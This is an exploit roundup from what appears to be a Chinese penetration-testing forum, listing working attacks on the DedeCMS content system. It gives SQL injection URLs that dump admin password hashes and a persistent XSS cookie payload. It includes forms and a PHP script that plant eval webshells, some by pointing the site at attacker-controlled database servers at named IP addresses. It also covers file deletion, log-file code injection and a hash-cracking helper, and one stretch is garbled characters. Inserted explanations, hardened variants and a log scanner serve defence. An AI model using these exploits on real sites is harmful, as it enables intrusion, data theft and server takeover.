中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: DedeCMS vulnerability roundup

Author: admin    Time: 2012-10-18 10:42

DedeCMS 5.6 rss.php SQL injection

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

The error-based updatexml() payload returns the admin user name and MID(pwd,4,16): the 16-character MD5 that sits inside the 20-character hash DedeCMS stores (see the note on the password format under advancedsearch.php further down).

DedeCMS v5.6 embedded malicious code execution (template tag injection)
Register a member, upload a "software" item and put the following in the "local address" field: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php (eC5waHA) containing <?php eval($_POST[xiao])?>, a one-line shell whose POST parameter is xiao.
Dede 5.6 GBK SQL injection

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
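What makes a GBK-decoded query injectable, as an added example that is not part of the original post: the application escapes quotes byte by byte (addslashes-style), the bytes reach a MySQL server that decodes them as GBK, and 0x5C (the backslash) is a legal GBK trail byte, so a high lead byte placed in front of the quote swallows the escape. The post does not show which code path member/index.php takes, so this is the general mechanism of the bug class; the infosearch.php payload at the end of the page (`q=%cf'...`) uses the same lead-byte trick. The table and column names and the attacker input are assumptions for illustration.

```python
# Added example, not code from the original post: the "wide byte" mechanism
# behind GBK SQL injection, with the vulnerable path next to a hardened one.
# Table/column names and the sample input are constructed for the demo.


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def vulnerable_query(uid: bytes) -> bytes:
    """Escape first, then splice the raw bytes into the query: the bug."""
    return b"SELECT * FROM dede_member WHERE userid='" + addslashes(uid) + b"'"


def as_seen_by_gbk_server(query: bytes) -> str:
    """Decode the same bytes as GBK, as a server with a GBK connection charset does.
    0xBF 0x5C is a valid two-byte character, so the backslash disappears into it."""
    return query.decode("gbk", errors="replace")


def hardened_query(uid: bytes) -> str:
    """Decode to characters first, then escape characters rather than bytes.
    A stray lead byte followed by 0x27 is not valid GBK and fails here."""
    text = uid.decode("gbk")  # raises UnicodeDecodeError for b"\xbf'"
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return "SELECT * FROM dede_member WHERE userid='" + escaped + "'"


def hardened_rejects(uid: bytes) -> bool:
    """True when the hardened path refuses the input as malformed GBK."""
    try:
        hardened_query(uid)
    except UnicodeDecodeError:
        return True
    return False


if __name__ == "__main__":
    payload = b"\xbf' OR 1=1#"  # constructed attacker input: lead byte, quote, injection
    print(as_seen_by_gbk_server(vulnerable_query(payload)))
    print("hardened path rejects it:", hardened_rejects(payload))
```

Run it and the first line printed is the query with the escape gone and a live `' OR 1=1#` after the swallowed byte; in practice the real fix is a prepared statement or an escaping routine that knows the connection charset (mysql_real_escape_string with the charset set), not hand-rolled escaping.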
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(`#@__` is DedeCMS's table-prefix placeholder, so `#@__admin` expands to dede_admin on a default install.)
DedeCMS (all versions) gotopage parameter XSS
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit". IE8/9 block URL-based XSS, so turn off the XSS filter first.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
The decoded String.fromCharCode payload stores the same "><script>...</script><x=" markup in a cookie named gotopage with a 365-day expiry; login.php reflects that cookie value, which is why the injection keeps firing without the parameter.

2. Close the browser; from then on, visiting either of the URLs below triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable override getshell
#!/usr/bin/php
<?php
// Request-variable override: the POST body smuggles _COOKIE[GLOBALS][cfg_db*]
// so that plus/mytag_js.php connects to the attacker's MySQL server, whose
// dede_mytag row holds the {dede:php} payload that writes the shell
// (see the "template tag remote file write" section further down).
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com
www.webvul.com
');
echo "\r\n";
if (count($argv) < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache    aid=2 shellpath /    aid=3 shellpath /plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = isset($argv[3]) ? $argv[3] : '';
$exp  = Getshell($url, $aid, $path);
// Getshell() returns the first response line; "OK" past offset 12 means "HTTP/1.1 200 OK".
if (strpos($exp, "OK") > 12) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    // cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname point at the attacker-controlled MySQL server;
    // QuickSearchBtn=%CC%E1%BD%BB is the GBK-encoded "提交" submit button of the HTML form.
    $content  = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return '';
    }
    fwrite($ock, $data);
    // Read only the status line; the caller checks it for "200 OK".
    $exp = fgets($ock, 1024);
    fclose($ock);
    return $exp;
}
?>
DedeCMS v5.6-5.7 unauthorized access (straight into the backend)
http://www.ssvdb.com/[backend directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug to the current CAPTCHA value and you are logged into the backend.

This is the same GLOBALS override as the mytag_js.php vector: the cfg_db* parameters point login.php at a database the attacker controls, so userid/pwd are checked against the attacker's own dede_admin row (admin / inimda here).

Precondition: the backend directory path must be known.
DedeCMS (织梦) template tag remote file write
Precondition: prepare your own DedeCMS database first, then insert the tag row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(The fwrite() argument is empty in the posted version; the shell source goes there.)

Then submit the form below and the shell ends up as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the URL typed into the doaction field before it is submitted.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
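The variable-override class behind the form above, the PHP exploit script and the login.php bypass, as an added example rather than DedeCMS's own code: a simplified Python model of a "register every request parameter as a global" loop guarded by a prefix blacklist that is only applied to top-level parameter names. The starting globals, the forbidden-prefix list, the host names and the address 198.51.100.7 are assumptions; the step that merges a GLOBALS array into the global table models the effect the exploits rely on, not PHP's internals. The hardened variant checks every key at every depth and refuses parameters named after a request source.

```python
import re
from urllib.parse import parse_qsl

# Added example, not DedeCMS's code: a model of request-variable registration
# that a nested _COOKIE[GLOBALS][cfg_db*] / _POST[GLOBALS][cfg_db*] array can
# subvert. DEFAULTS, FORBIDDEN, the host names and the IP are constructed.

DEFAULTS = {"cfg_dbhost": "localhost", "cfg_dbuser": "dede", "cfg_dbprefix": "dede_"}
SOURCES = ("_GET", "_POST", "_COOKIE")
FORBIDDEN = re.compile(r"^(cfg_|GLOBALS)")


def php_parse_qs(body: str) -> dict:
    """Parse a form body the way PHP does: a[b][c]=v becomes nested dicts."""
    result: dict = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        head = re.match(r"[^\[]*", raw_key).group(0)
        path = [head] + re.findall(r"\[([^\]]*)\]", raw_key[len(head):])
        node = result
        for k in path[:-1]:
            if not isinstance(node.get(k), dict):
                node[k] = {}
            node = node[k]
        node[path[-1]] = value
    return result


def check_toplevel_only(sources: dict) -> None:
    """The weak check: only the names of top-level parameters are tested."""
    for params in sources.values():
        for key in params:
            if FORBIDDEN.match(key):
                raise ValueError("Request var not allow!")


def check_recursive(sources: dict) -> None:
    """Hardened check: every key at every depth, and no parameter may be named
    after a request source, so a nested array cannot be smuggled in."""
    def walk(obj):
        if isinstance(obj, dict):
            for key, value in obj.items():
                if FORBIDDEN.match(key) or key in SOURCES:
                    raise ValueError("Request var not allow!")
                walk(value)
    for params in sources.values():
        walk(params)


def register_request_vars(get: dict, post: dict, cookie: dict, check) -> dict:
    """Run `check`, then copy every parameter into the global table.
    Writing a name equal to a source replaces that source (which is walked
    later in the same loop); writing GLOBALS merges into the table. Both are
    the effects the exploits rely on, modelled here rather than taken from PHP."""
    table = dict(DEFAULTS)
    sources = {"_GET": dict(get), "_POST": dict(post), "_COOKIE": dict(cookie)}
    check(sources)
    for name in SOURCES:
        for key, value in list(sources[name].items()):
            if key in sources and isinstance(value, dict):
                sources[key] = value
            elif key == "GLOBALS" and isinstance(value, dict):
                table.update(value)
            else:
                table[key] = value
    return table


# Constructed POST body in the shape of the mytag_js.php request above.
EXPLOIT_BODY = ("doaction=http://target/plus/mytag_js.php?aid=1"
                "&_COOKIE[GLOBALS][cfg_dbhost]=198.51.100.7"
                "&_COOKIE[GLOBALS][cfg_dbuser]=exploit&nocache=true")


def effective_dbhost(body: str, check) -> str:
    """cfg_dbhost the application would connect to after registering a POST body."""
    return register_request_vars({}, php_parse_qs(body), {}, check)["cfg_dbhost"]


def override_blocked(body: str, check) -> bool:
    """True when `check` rejects the request before anything is registered."""
    try:
        effective_dbhost(body, check)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("weak check, db host:", effective_dbhost(EXPLOIT_BODY, check_toplevel_only))
    print("recursive check blocks it:", override_blocked(EXPLOIT_BODY, check_recursive))
```

With the top-level check the POST pass installs the attacker's `_COOKIE` array, the cookie pass then walks it and `cfg_dbhost` becomes 198.51.100.7; the same thing happens with `_POST[GLOBALS][...]` arriving in the query string, which is the login.php variant. The recursive check stops both, but the real lesson is to never register request input into the global namespace at all.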
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, log into the member area, post an article and upload an image. Then, in attachment management, replace the image with a crafted template; say the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (if the image format is checked, prefix it with gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source and build a form like this:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(these two fields are the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">Content</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value='<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>' style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>CAPTCHA:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit it; if it reports the edit succeeded, the template path has been changed. 3. Visit the edited article:
Assuming the edited article's aid is 2, request:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.
DedeCMS Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>
Build the form above; after the upload the image is stored as /uploads/userup/3/1.gif.
Post an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
DedeCMS (织梦) V5.6 remote file deletion

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
oldface is meant to be a path under the member's upload directory; the ../ sequences are not stripped, so files outside that directory can be deleted.
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../
% F! B9 l( d/ C* m0 r, y( R1 E0 ~4 Q  ^0 s

) }$ ?$ @; M# ~  A8 M) Z( A$ j# f
2 X1 ^( r# h  c1 m* A9 k! g" k% \5 e4 c  m. S' ~* a
: n$ O  {2 l4 w; y& k

/ N) p- A! _7 N( @! t* n9 ^) i0 M" T" ?! M

3 A0 h( L, A: H2 U5 }7 I3 F3 r* X  d0 F  F; Y' _$ |% q' f

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
Password format: the stored value is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character string; remove 3 more from the front and 1 from the end and you have the standard 16-character MD5 (characters 9-24 of the full hash), which can be looked up or cracked like any MD5.
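The hash arithmetic in the note above, as an added example that is not code from the post: derive the 16-character MD5 from the 20-character dede_admin.pwd value and verify or crack a candidate against it. The only input is the stored 20-character string; the word list is constructed.

```python
import hashlib
from typing import Iterable, Optional

# Added example, not from the original post: DedeCMS admin hash arithmetic.
# The stored value is md5(password)[5:25]; the 16-char MD5 inside it is
# md5(password)[8:24], the same 16 characters the rss.php payload above pulls
# with MID(pwd,4,16).


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_hash(password: str) -> str:
    """20-char form as stored in dede_admin.pwd: 32-char MD5 minus 5 leading and 7 trailing chars."""
    return md5_hex(password)[5:-7]


def dede_hash_to_md5_16(pwd20: str) -> str:
    """Drop 3 leading and 1 trailing char: the standard 16-char MD5."""
    if len(pwd20) != 20:
        raise ValueError("expected the 20-char DedeCMS form, got %d chars" % len(pwd20))
    return pwd20[3:-1]


def verify_dede_password(pwd20: str, candidate: str) -> bool:
    """True when candidate hashes to the stored 20-char value (compared on the 16-char core)."""
    return dede_hash_to_md5_16(pwd20) == md5_hex(candidate)[8:24]


def crack_dede_hash(pwd20: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word in wordlist that matches, or None."""
    target = dede_hash_to_md5_16(pwd20)
    for word in wordlist:
        if md5_hex(word)[8:24] == target:
            return word
    return None


if __name__ == "__main__":
    stored = "f297a57a5a743894a0e4"  # dede_admin.pwd for the password "admin"
    print("16-char MD5:", dede_hash_to_md5_16(stored))
    print("cracked:", crack_dede_hash(stored, ["123456", "password", "admin"]))
```

Because the 16-character core is a plain substring of an unsalted MD5, the 20-character form is no stronger than a 16-character MD5 lookup; that is why dumping dede_admin.pwd is as good as dumping the password for any value that appears in a rainbow table.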

DedeCMS (织梦) 5.1 plus/feedback_js.php SQL injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS (织梦) select_soft_post.php uninitialised variable vulnerability
With register_globals on, the cfg_* settings the upload handler relies on are never initialised by the script itself, so the POST body below supplies them: the allowed file types and the base directory become attacker-controlled and a .php file lands in /data/cache/.
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection
It combines a MySQL numeric overflow error with the fact that DedeCMS records database errors in a PHP file (data/mysql_error_trace.php) without validating the file header. The logged line ends with `*/ ?>` and the mid value begins with `*/`, so it closes the logger's comment early and the injected eval() becomes live PHP in the log file; the int(3) at the start of the logged output is var_dump(3) from the payload running.
1. Request:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Request
http://www.abc.com/data/mysql_error_trace.php and seeing the following confirms the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php SQL injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
The %cf prefix is the wide-byte trick from the GBK injection above: the 0xCF lead byte pairs with the backslash that escaping inserts, leaving the quote unescaped.
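A request-line scanner for the vectors collected on this page, as an added example that is not part of the post: each rule matches the distinctive part of one of the URLs above after URL-decoding, and the log lines it runs over are constructed in Apache combined format with documentation addresses. The rule names are my own. It catches only what the access log records (method, path, query string), so the mytag_js.php POST body needs a body-logging proxy or a WAF rule instead.

```python
import re
from urllib.parse import unquote

# Added example, not from the original post: indicators for the DedeCMS
# vectors listed on this page, run over constructed access-log lines.

RULES = [
    ("globals_override", re.compile(r"_(?:GET|POST|COOKIE)\[GLOBALS\]", re.I)),
    ("advancedsearch_sql", re.compile(r"advancedsearch\.php\?.*\bsql=", re.I)),
    ("rss_injection", re.compile(r"rss\.php\?.*_Cs\[", re.I)),
    ("template_tag_in_request", re.compile(r"\{/?dede:(?:php|field[^}]*runphp)", re.I)),
    ("gotopage_xss", re.compile(r"gotopage=.*<script", re.I)),
    ("edit_face_delete", re.compile(r"edit_face\.php\?.*dopost=delold.*\.\./", re.I)),
    ("carbuyaction_lfi", re.compile(r"carbuyaction\.php\?.*code=.*\.\./", re.I)),
    ("select_soft_post_upload", re.compile(r"select_soft_post\.php", re.I)),
    ("mysql_error_trace", re.compile(r"mysql_error_trace\.php", re.I)),
    ("digg_frame_injection", re.compile(r"digg_frame\.php\?.*mid=", re.I)),
    ("union_in_plus_script", re.compile(r"(?:feedback_js|infosearch)\.php\?.*\bunion\b", re.I)),
]

# Method and request target from a combined-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')


def request_target(line: str):
    """Return the URL-decoded request target of a log line, or None if there is none."""
    m = REQUEST_RE.search(line)
    return unquote(m.group(1)) if m else None


def scan_access_log(lines):
    """Map 1-based line numbers to the names of every rule that matched that line."""
    hits = {}
    for n, line in enumerate(lines, start=1):
        target = request_target(line)
        if target is None:
            continue
        names = [name for name, rx in RULES if rx.search(target)]
        if names:
            hits[n] = names
    return hits


# Constructed sample log: one benign request among attempts shaped like the URLs above.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:01 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=198.51.100.7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:02 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.20 - - [18/Oct/2012:10:42:03 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9182 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:04 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:05 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Oct/2012:10:42:06 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, names in scan_access_log(SAMPLE_LOG.splitlines()).items():
        print(n, ", ".join(names))
```

Decoding before matching matters: the login bypass arrives as `_POST%5BGLOBALS%5D`, and a rule written against the encoded form is trivially evaded by double encoding or mixed case. A read of data/mysql_error_trace.php by anything other than a local administrator is worth an alert on its own.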





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2